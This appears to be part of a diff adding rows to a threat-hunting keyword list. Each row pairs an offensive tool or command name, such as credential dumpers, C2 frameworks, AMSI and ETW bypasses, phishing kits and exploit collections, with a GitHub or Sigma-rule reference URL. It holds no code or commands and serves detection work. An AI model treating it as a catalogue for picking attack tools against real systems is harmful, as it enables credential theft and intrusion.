+"evilgrade","https://github.com/infobyte/evilgrade" +"EvilLsassTwin","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin" +"EvilnoVNC","https://github.com/JoelGMSec/EvilnoVNC" +"evilqr","https://github.com/kgretzky/evilqr" +"evil-winrm","https://github.com/Hackplayers/evil-winrm" +"EvtMute","https://github.com/bats3c/EvtMute" +"Excel","https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml" +"Excel-Exploit","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main" +"exe_to_dll","https://github.com/hasherezade/exe_to_dll" +"exe2powershell","https://github.com/yanncam/exe2powershell" +"Executable_Files","https://github.com/reveng007/Executable_Files" +"exegol","https://github.com/ThePorgs/Exegol" +"expl-bin","https://github.com/sailay1996/expl-bin" +"exploits","https://github.com/XiphosResearch/exploits" +"Exploits","https://github.com/WindowsExploits/Exploits" +"export","N/A" +"ExpressVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Exrop","https://github.com/d4em0n/exrop" +"ExtractBitlockerKeys","https://github.com/p0dalirius/ExtractBitlockerKeys" +"EyeWitness","https://github.com/FortyNorthSecurity/EyeWitness" +"FakeAMSI","https://github.com/gtworek/PSBits/tree/master/FakeAMSI" +"FakeCmdLine","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine" +"FakeImageExploiter","https://github.com/r00t-3xp10it/FakeImageExploiter" +"fakelogonscreen","https://github.com/bitsadmin/fakelogonscreen" +"fake-sms","https://github.com/Narasimha1997/fake-sms" +"Farmer","https://github.com/mdsecactivebreach/Farmer" +"FastestVPN Proxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"fastfuzz","https://github.com/tismayil/fastfuz-chrome-ext" +"FastStunnel VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"fcrackzip","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html" +"ffuf","https://github.com/ffuf/ffuf" +"fgdump","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump" +"FiercePhish","https://github.com/Raikia/FiercePhish" +"file.io","https://twitter.com/mthcht/status/1660953897622544384" +"fileless-elf-exec","https://github.com/nnsee/fileless-elf-exec" +"FilelessPELoader","https://github.com/TheD1rkMtr/FilelessPELoader" +"find","N/A" +"find","https://github.com/ice-wzl/wmiexec2" +"find","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" +"Findsploit","https://github.com/1N3/Findsploit" +"findstr","N/A" +"findstr","https://github.com/gabriellandau/PPLFault" +"findsubdomains","https://findsubdomains.com/" +"FindUncommonShares","https://github.com/p0dalirius/FindUncommonShares" +"firefox_decrypt","https://github.com/unode/firefox_decrypt" +"firesheep","https://codebutler.github.io/firesheep/" +"FlipperZero","https://docs.flipper.net/qflipper/windows-debug" +"fltMC","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/unload_sysmon_driver_with_fltmc.ps1" +"FluxionNetwork","https://github.com/FluxionNetwork/fluxion" +"FMFASweep","https://github.com/dafthack/MFASweep" +"FOCA","https://github.com/ElevenPaths/FOCA" +"ForgeCert","https://github.com/GhostPack/ForgeCert" +"forkatz","https://github.com/Barbarisch/forkatz" +"Fornex VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"FourEye","https://github.com/lengjibo/FourEye" +"FoxyProxy Standard","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"frampton","https://github.com/ins1gn1a/Frampton" +"Free Avira Phantom VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Free Fast VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Free One Touch VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Free Proxy VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Free Residential VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Free VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"FREE VPN DEWELOPMENT","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Free VPN for Chrome","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"freefilesync","https://freefilesync.org/download.php" +"Freeze","https://github.com/optiv/Freeze" +"Freeze.rs","https://github.com/optiv/Freeze.rs" +"ftype","N/A" +"Fuck-Etw","https://github.com/unkvolism/Fuck-Etw" +"FudgeC2","https://github.com/Ziconius/FudgeC2" +"FunctionalC2","https://github.com/FortyNorthSecurity/FunctionalC2" +"fuxploider","https://github.com/almandin/fuxploider" +"fuzz.txt","https://github.com/Bo0oM/fuzz.txt/blob/master/fuzz.txt" +"fuzzdb","https://github.com/fuzzdb-project/fuzzdb" +"GadgetToJScript","https://github.com/med0x2e/GadgetToJScript" +"gateway-finder-imp","https://github.com/whitel1st/gateway-finder-imp" +"GatherContacts","https://github.com/clr2of8/GatherContacts" +"gato","https://github.com/praetorian-inc/gato" +"GC2-sheet","https://github.com/looCiprian/GC2-sheet" +"gcat","https://github.com/byt3bl33d3r/gcat" +"GCPBucketBrute","https://github.com/RhinoSecurityLabs/GCPBucketBrute" +"GCR-Google-Calendar-RAT","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT" +"Generate-Macro","https://github.com/enigma0x3/Generate-Macro" +"genHTA","https://github.com/mdsecactivebreach/genHTA" +"GeoProxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"getcap","N/A" +"Getcap","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"getent","N/A" +"getExploit","https://github.com/Gioyik/getExploit" +"Get-RBCD-Threaded","https://github.com/FatRodzianko/Get-RBCD-Threaded" +"getsploit","https://github.com/vulnersCom/getsploit" +"ghidra","https://github.com/NationalSecurityAgency/ghidra" +"GhostInTheNet","https://github.com/cryptolok/GhostInTheNet" +"GhostPack","https://github.com/GhostPack" +"Ghostpack-CompiledBinaries","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries" +"gimmecredz","https://github.com/0xmitsurugi/gimmecredz" +"gimmeSH","https://github.com/A3h1nt/gimmeSH" +"github","https://github.com/" +"Github Username","https://github.com/SecureAuthCorp" +"Github Username","https://github.com/SpiderLabs" +"Github Username","https://github.com/0x00-0x00" +"Github Username","https://github.com/RhinoSecurityLabs" +"Github Username","https://github.com/realgam3" +"Github Username","https://github.com/RedTeamOperations" +"Github Username","https://github.com/rasta-mouse" +"Github Username","https://github.com/quickbreach" +"Github Username","https://github.com/r00t-3xp10it" +"Github Username","https://github.com/s0lst1c3" +"Github Username","https://github.com/sailay1996" +"Github Username","https://github.com/sc0tfree" +"Github Username","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" +"Github Username","https://github.com/s0md3v" +"Github Username","https://github.com/S3cur3Th1sSh1t" +"Github Username","https://github.com/pentestmonkey" +"Github Username","https://github.com/mwrlabs" +"Github Username","https://github.com/n1nj4sec" +"Github Username","https://github.com/Mr-Un1k0d3r" +"Github Username","https://github.com/mogwailabs" +"Github Username","https://github.com/MooseDojo" +"Github Username","https://github.com/nccgroup" +"Github Username","https://github.com/obscuritylabs" +"Github Username","https://github.com/P0cL4bs" +"Github Username","https://github.com/nyxgeek" +"Github Username","https://github.com/neoneggplant" +"Github Username","https://github.com/NextronSystems" +"Github Username","https://github.com/Screetsec" +"Github Username","https://github.com/virajkulkarni14" +"Github Username","https://github.com/Viralmaniar" +"Github Username","https://github.com/unixpickle" +"Github Username","https://github.com/TryCatchHCF" +"Github Username","https://github.com/Und3rf10w" +"Github Username","https://github.com/vysecurity" +"Github Username","https://github.com/xoreaxeaxeax" +"Github Username","https://twitter.com/Cneelis" +"Github Username","https://github.com/xillwillx" +"Github Username","https://github.com/x0rz" +"Github Username","https://github.com/x90skysn3k" +"Github Username","https://github.com/trustedsec" +"Github Username","https://github.com/SecWiki/windows-kernel-exploits" +"Github Username","https://github.com/sensepost" +"Github Username","https://github.com/securitywithoutborders" +"Github Username","https://github.com/secgroundzero" +"Github Username","https://github.com/secrary" +"Github Username","https://github.com/SilverPoision" +"Github Username","https://github.com/toolswatch/blackhat-arsenal-tools" +"Github Username","https://github.com/True-Demon" +"Github Username","https://github.com/tiagorlampert" +"Github Username","https://github.com/SySS-Research" +"Github Username","https://github.com/threatexpress" +"Github Username","https://github.com/Cybellum" +"Github Username","https://github.com/CyDefUnicorn" +"Github Username","https://github.com/curi0usJack" +"Github Username","https://github.com/Coalfire-Research" +"Github Username","https://github.com/cryptolok" +"Github Username","https://github.com/D4Vinci/" +"Github Username","https://github.com/deepzec" +"Github Username","https://github.com/DominicBreuker" +"Github Username","https://github.com/dchrastil" +"Github Username","https://github.com/dafthack" +"Github Username","https://github.com/danielbohannon" +"Github Username","https://github.com/Cn33liz" +"Github Username","https://github.com/BastilleResearch" +"Github Username","https://github.com/BC-SECURITY" +"Github Username","https://github.com/attackercan/" +"Github Username","https://github.com/aboul3la" +"Github Username","https://github.com/Arno0x" +"Github Username","https://github.com/Ben0xA" +"Github Username","https://github.com/byt3bl33d3r" +"Github Username","https://github.com/chrisk44/Hijacker" +"Github Username","https://github.com/Bo0oM" +"Github Username","https://github.com/berzerk0" +"Github Username","https://github.com/BishopFox" +"Github Username","https://github.com/enigma0x3" +"Github Username","https://github.com/klsecservices/s7scan" +"Github Username","https://github.com/lanjelot" +"Github Username","https://github.com/klsecservices" +"Github Username","https://github.com/kgretzky" +"Github Username","https://github.com/khast3x" +"Github Username","https://github.com/leapsecurity" +"Github Username","https://github.com/matterpreter" +"Github Username","https://github.com/mdsecactivebreach/" +"Github Username","https://github.com/m8r0wn" +"Github Username","https://github.com/LordNoteworthy" +"Github Username","https://github.com/m4ll0k" +"Github Username","https://github.com/JPCERTCC" +"Github Username","https://github.com/GoSecure" +"Github Username","https://github.com/h0nus" +"Github Username","https://github.com/g0tmi1k" +"Github Username","https://github.com/evilsocket" +"Github Username","https://github.com/FortyNorthSecurity" +"Github Username","https://github.com/Hack-with-Github" +"Github Username","https://github.com/itsKindred" +"Github Username","https://github.com/jedisct1" +"Github Username","https://github.com/Invoke-IR" +"Github Username","https://github.com/HarmJ0y" +"Github Username","https://github.com/hlldz" +"GithubC2","https://github.com/TheD1rkMtr/GithubC2" +"Gitleaks","https://github.com/zricethezav/gitleaks" +"Git-Scanner","https://github.com/HightechSec/git-scanner" +"GIUDA","https://github.com/foxlox/GIUDA" +"glit","https://github.com/shadawck/glit" +"gMSADumper","https://github.com/micahvandeusen/gMSADumper" +"GMSAPasswordReader","https://github.com/rvazarkar/GMSAPasswordReader" +"gobfuscate","https://github.com/unixpickle/gobfuscate" +"gobuster","https://github.com/OJ/gobuster" +"gocrack","https://github.com/mandiant/gocrack" +"godoh","https://github.com/sensepost/godoh" +"godpotato","https://github.com/BeichenDream/GodPotato" +"GoFetch","https://github.com/GoFetchAD/GoFetch" +"golang_c2","https://github.com/m00zh33/golang_c2" +"GoldenGMSA","https://github.com/Semperis/GoldenGMSA" +"Gom VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"goMatrixC2","https://github.com/n1k7l4i/goMatrixC2" +"GONET-Scanner","https://github.com/luijait/GONET-Scanner" +"GooDork","https://github.com/k3170makan/GooDork" +"Goodsync","https://www.goodsync.com/" +"goPassGen","https://github.com/bigb0sss/goPassGen" +"gophish","https://github.com/puzzlepeaches/sneaky_gophish/" +"gophish","https://github.com/gophish/gophish" +"gophish","https://github.com/fin3ss3g0d/evilgophish" +"Gorsair","https://github.com/Ullaakut/Gorsair" +"go-secdump","https://github.com/jfjallid/go-secdump" +"gost","https://github.com/ginuerzh/gost" +"Gotato","https://github.com/iammaguire/Gotato" +"goZulipC2","https://github.com/n1k7l4i/goZulipC2" +"gpg","N/A" +"GPOddity","https://github.com/synacktiv/GPOddity" +"gpp-decrypt","https://gitlab.com/kalilinux/packages/gpp-decrypt" +"GPSCoordinates","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates" +"GreatSCT","https://github.com/GreatSCT/GreatSCT" +"Greenwolf","https://github.com/Greenwolf/social_mapper" +"grep","https://gtfobins.github.io/" +"grep","N/A" +"grep","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" +"grep","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"Group3r","https://github.com/Group3r/Group3r" +"gtfobins","https://gtfobins.github.io/" +"GTFOBLookup","https://github.com/nccgroup/GTFOBLookup" +"Guru VPN & Proxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"h8mail","https://github.com/opencubicles/h8mail" +"h8mail","https://github.com/khast3x/h8mail" +"HackBrowserData","https://github.com/moonD4rk/HackBrowserData" +"hackingtool","https://github.com/Z4nzu/hackingtool" +"HackTheWorld","https://github.com/stormshadow07/HackTheWorld" +"hack-tools","https://github.com/LasCC/Hack-Tools" +"hades","https://github.com/f1zm0/hades" +"HadesLdr","https://github.com/CognisysGroup/HadesLdr" +"hakrawler","https://github.com/hakluke/hakrawler" +"HardHatC2","https://github.com/DragoQCC/HardHatC2" +"Harvester_OF_SORROW","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt" +"Hash-Buster","https://github.com/s0md3v/Hash-Buster" +"hashcat","https://github.com/hashcat/hashcat" +"hashview","https://github.com/hashview/hashview" +"havoc","https://github.com/its-a-feature/Mythic" +"havoc","https://github.com/HavocFramework/Havoc" +"hcxdumptool","https://github.com/ZerBea/hcxdumptool" +"HeapCrypt","https://github.com/TheD1rkMtr/HeapCrypt" +"HeartBleed","https://github.com/TechnicalMujeeb/HeartBleed" +"HEKATOMB","https://github.com/Processus-Thief/HEKATOMB" +"HellsGate","https://github.com/am0nsec/HellsGate" +"Heroinn","https://github.com/b23r0/Heroinn" +"Hibr2Dmp","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/dump_lsass_by_converting_hiberfil_to_dmp.ps1" +"Hide My IP VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"HideAll VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Hideman VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"HideProcess","https://github.com/landhb/HideProcess" +"Hijacker","https://github.com/chrisk44/Hijacker" +"HijackHunter","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter" +"history","N/A" +"HMA VPN Proxy Unblocker","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"hoaxshell","https://github.com/t3l3machus/hoaxshell" +"Hola Free VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Hola VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"holehe","https://github.com/megadose/holehe" +"HoneypotBuster","https://github.com/JavelinNetworks/HoneypotBuster" +"HookDetector","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector" +"HostRecon","https://github.com/dafthack/HostRecon" +"Hotspot Shield Elite VPN Proxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Hotspot Shield Free VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Hoxx VPN Proxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"hping","https://github.com/antirez/hping" +"hping3","https://github.com/RoseSecurity/Red-Teaming-TTPs" +"HRShell","https://github.com/chrispetrou/HRShell" +"HTMLSmuggler","https://github.com/D00Movenok/HTMLSmuggler" +"htshells","https://github.com/wireghoul/htshells" +"http.server","N/A" +"https-portal","https://github.com/SteveLTN/https-portal" +"Huan","https://github.com/frkngksl/Huan" +"Hub VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Hunter.io","https://hunter.io/" +"hyperion","https://www.kali.org/tools/hyperion/" +"Hypnos","https://github.com/CaptainNox/Hypnos" +"hypobrychium","https://github.com/foxlox/hypobrychium" +"I2P","https://geti2p.net/" +"icalcs","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin" +"icalcs","https://github.com/ice-wzl/wmiexec2" +"icebreaker","https://github.com/DanMcInerney/icebreaker" +"icmpsh","https://github.com/r00t-3xp10it/venom" +"icmpsh","https://github.com/bdamele/icmpsh" +"ICMP-TransferTools","https://github.com/icyguider/ICMP-TransferTools" +"icmptunnel","https://github.com/s-h-3-l-l/katoolin3" +"IDiagnosticProfileUAC","https://github.com/Wh04m1001/IDiagnosticProfileUAC" +"ifconfig","N/A" +"ifconfig","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"IIS-Raid","https://github.com/0x09AL/IIS-Raid" +"IKEForce","https://github.com/SpiderLabs/ikeforce" +"impacket","https://github.com/oldboy21/LDAP-Password-Hunter" +"impacket","https://github.com/SecureAuthCorp/impacket" +"impacket","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py" +"impacket","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference" +"impacket","https://github.com/dirkjanm/krbrelayx" +"impacket","https://github.com/fortra/impacket" +"impersonate-rs","https://github.com/zblurx/impersonate-rs" +"Imperva_gzip_WAF_Bypass","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass" +"ImplantSSP","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP" +"inceptor","https://github.com/klezVirus/inceptor" +"Indirect-Syscalls","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls" +"infernal-twin","https://github.com/entropy1337/infernal-twin" +"Infoga","https://github.com/m4ll0k/Infoga" +"iNinja VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"injectify","https://github.com/samdenty/injectify" +"InjectProc","https://github.com/secrary/InjectProc" +"InsecurePowerShell","https://github.com/cobbr/InsecurePowerShell" +"InspectAssembly","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly" +"interactsh","https://github.com/projectdiscovery/interactsh" +"Intercepter-NG","https://github.com/intercepter-ng" +"Internal-Monologue","https://github.com/eladshamir/Internal-Monologue" +"IntruderPayloads","https://github.com/1N3/IntruderPayloads" +"Inveigh","https://github.com/Kevin-Robertson/Inveigh" +"InvisibilityCloak","https://github.com/h4wkst3r/InvisibilityCloak" +"Invisi-Shell","https://github.com/OmerYa/Invisi-Shell" +"Invoke-ACLpwn","https://github.com/fox-it/Invoke-ACLPwn" +"Invoke-AzureEnum","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzureEnum.ps1" +"Invoke-AzurePasswordSpray","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzurePasswordSpray.ps1" +"Invoke-BSOD","https://github.com/peewpw/Invoke-BSOD" +"Invoke-BuildAnonymousSMBServer","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer" +"Invoke-DOSfuscation","https://github.com/danielbohannon/Revoke-Obfuscation" +"Invoke-DOSfuscation","https://github.com/danielbohannon/Invoke-DOSfuscation" +"Invoke-Obfuscation","https://github.com/danielbohannon/Invoke-Obfuscation" +"Invoke-Phant0m","https://github.com/hlldz/Invoke-Phant0m" +"invoke-piper","https://github.com/p3nt4/Invoke-Piper" +"Invoke-PowerThIEf","https://github.com/nettitude/Invoke-PowerThIEf" +"Invoke-PrintDemon","https://github.com/BC-SECURITY/Invoke-PrintDemon" +"Invoke-ProcessScan","https://github.com/vysecurity/Invoke-ProcessScan" +"Invoke-PSImage","https://github.com/peewpw/Invoke-PSImage" +"Invoke-SMBRemoting","https://github.com/Leo4j/Invoke-SMBRemoting" +"Invoke-SocksProxy","https://github.com/p3nt4/Invoke-SocksProxy" +"Invoke-TheHash","https://github.com/Kevin-Robertson/Invoke-TheHash" +"Invoke-TmpDavFS","https://github.com/p3nt4/Invoke-TmpDavFS" +"Invoke-WCMDump","https://github.com/peewpw/Invoke-WCMDump" +"Invoke-ZeroLogon","https://github.com/BC-SECURITY/Invoke-ZeroLogon" +"iodine","https://linux.die.net/man/8/iodine" +"ip","N/A" +"IP Unblock","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"ip-api.com","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" +"IPBurger Proxy & VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"ipscan","https://github.com/angryip/ipscan" +"iptables","https://attack.mitre.org/techniques/T1562/001/" +"ipv4.myip.wtf","https://github.com/3ct0s/disctopia-c2/blob/main/libraries/disctopia.py" +"ItWasAllADream","https://github.com/byt3bl33d3r/ItWasAllADream" +"ivy","https://github.com/optiv/Ivy" +"jackdaw","https://github.com/skelsec/jackdaw" +"jackit","https://github.com/insecurityofthings/jackit" +"Jatayu","https://github.com/SpiderMate/Jatayu" +"java-deserialization-exploits","https://github.com/Coalfire-Research/java-deserialization-exploits" +"javascript-obfuscator","https://github.com/javascript-obfuscator/javascript-obfuscator" +"Jira-Lens","https://powersploit.readthedocs.io/en/stable/Recon/README/" +"Jira-Lens","https://github.com/MayankPandey01/Jira-Lens" +"john","https://github.com/openwall/john/" +"JohnTheRipper","https://github.com/magnumripper/JohnTheRipper" +"joomscan","https://github.com/rezasp/joomscan" +"Jormungandr","https://github.com/Idov31/Jormungandr" +"JuicyPotatoNG","https://github.com/antonioCoco/JuicyPotatoNG" +"JunctionFolder","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder" +"JustEvadeBro","https://github.com/sinfulz/JustEvadeBro" +"jwt_tool","https://github.com/ticarpi/jwt_tool" +"kali","https://www.kali.org/" +"kali-anonsurf","https://github.com/Und3rf10w/kali-anonsurf" +"kalitorify","https://github.com/brainfucksec/kalitorify" +"katoolin3","https://github.com/s-h-3-l-l/katoolin3" +"keepass-password-dumper","https://github.com/vdohney/keepass-password-dumper" +"Keethief","https://github.com/GhostPack/KeeThief" +"KeeThiefSyscalls","https://github.com/Metro-Holografix/KeeThiefSyscalls" +"kekeo","https://github.com/gentilkiwi/kekeo" +"kerberoast","https://github.com/xan7r/kerberoast" +"kerberoast","https://github.com/nidem/kerberoast" +"kerbrute","https://github.com/ropnop/kerbrute" +"keylogger keyword","N/A" +"KeyTabExtract","https://github.com/sosdave/KeyTabExtract" +"KillDefenderBOF","https://github.com/Cerbersec/KillDefenderBOF" +"kismet","https://github.com/kismetwireless/kismet" +"KittyStager","https://github.com/Enelg52/KittyStager" +"koadic","https://github.com/zerosum0x0/koadic" +"koadic","https://github.com/offsecginger/koadic" +"krackattacks-scripts","https://github.com/vanhoefm/krackattacks-scripts" +"KrakenMask","https://github.com/RtlDallas/KrakenMask" +"krbjack","https://github.com/almandin/krbjack" +"KrbRelay","https://github.com/cube0x0/KrbRelay" +"krbrelayx","https://github.com/dirkjanm/krbrelayx" +"KRBUACBypass","https://github.com/wh0amitz/KRBUACBypass" +"kubesploit","https://github.com/cyberark/kubesploit" +"kwetza","https://github.com/sensepost/kwetza" +"L0phtCrack","http://www.l0phtcrack.com/" +"LALIN","https://github.com/screetsec/LALIN" +"LANs.py","https://github.com/DanMcInerney/LANs.py" +"LAPSDecrypt","https://gist.github.com/xpn/23dc5b6c260a7571763ca8ca745c32f4" +"LAPSDumper","https://github.com/n00py/LAPSDumper" +"LAPSToolkit","https://github.com/leoloobeek/LAPSToolkit" +"LaZagne","https://github.com/AlessandroZ/LaZagne" +"LaZagneForensic","https://github.com/AlessandroZ/LaZagneForensic" +"LAZYPARIAH","https://github.com/octetsplicer/LAZYPARIAH" +"ldapdomaindump","https://github.com/dirkjanm/ldapdomaindump" +"ldapminer","https://sourceforge.net/projects/ldapminer/" +"ldapnomnom","https://github.com/lkarlslund/ldapnomnom" +"LdapRelayScan","https://github.com/zyn3rgy/LdapRelayScan" +"ldapsearch","https://man7.org/linux/man-pages/man1/ldapsearch.1.html" +"ldapsearch-ad","https://github.com/yaap7/ldapsearch-ad" +"LDAPWordlistHarvester","https://github.com/p0dalirius/LDAPWordlistHarvester" +"ldeep","https://github.com/franc-pentest/ldeep" +"ldifde","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" +"Lethean Proxy VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"LightsOut","https://github.com/icyguider/LightsOut" +"ligolo","https://github.com/sysdream/ligolo" +"LinEnum","https://github.com/rebootuser/LinEnum" +"LinkedInt","https://github.com/mdsecactivebreach/LinkedInt" +"linux","https://github.com/RoseSecurity/Red-Teaming-TTPs" +"linux-exploit-suggester","https://github.com/The-Z-Labs/linux-exploit-suggester" +"linuxprivchecker","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py" +"linux-smart-enumeration","https://github.com/diego-treitos/linux-smart-enumeration" +"linWinPwn","https://github.com/lefayjey/linWinPwn" +"litefuzz","https://github.com/sec-tools/litefuzz" +"localpotato","https://github.com/decoder-it/LocalPotato" +"locate","N/A" +"Locksmith","https://github.com/TrimarcJake/Locksmith" +"LoGiC.NET","https://github.com/AnErrupTion/LoGiC.NET" +"LogonTracer","https://github.com/JPCERTCC/LogonTracer" +"LOLBAS-Project","https://lolbas-project.github.io/" +"Lovely-Potato","https://github.com/TsukiCTF/Lovely-Potato" +"lsass","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference" +"LsassSilentProcessExit","https://github.com/deepinstinct/LsassSilentProcessExit" +"lsassy","https://github.com/Hackndo/lsassy" +"luckystrike","https://github.com/curi0usJack/luckystrike" +"lyncsmash","https://github.com/nyxgeek/lyncsmash" +"LyncSniper","https://github.com/mdsecactivebreach/LyncSniper" +"MAAD-AF","https://github.com/vectra-ai-research/MAAD-AF" +"MaccaroniC2","https://github.com/CalfCrusher/MaccaroniC2" +"macchanger","N/A" +"macetrap","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/MaceTrap" +"macro_pack","https://github.com/sevagas/macro_pack" +"Macrome","https://github.com/michaelweber/Macrome" +"MacroMeter","https://github.com/Cn33liz/MacroMeter" +"mailpv","https://www.nirsoft.net/utils/mailpv.html" +"MailSniper","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1" +"MailSniper","https://github.com/dafthack/MailSniper" +"MaliciousMacroGenerator","https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator" +"MaliciousMacroMSBuild","https://github.com/infosecn1nja/MaliciousMacroMSBuild" +"MalSCCM","https://github.com/nettitude/MalSCCM" +"Malus VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"malware","N/A" +"malware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/" +"MANSPIDER","https://github.com/blacklanternsecurity/MANSPIDER" +"mars stealer","https://3xp0rt.com/posts/mars-stealer" 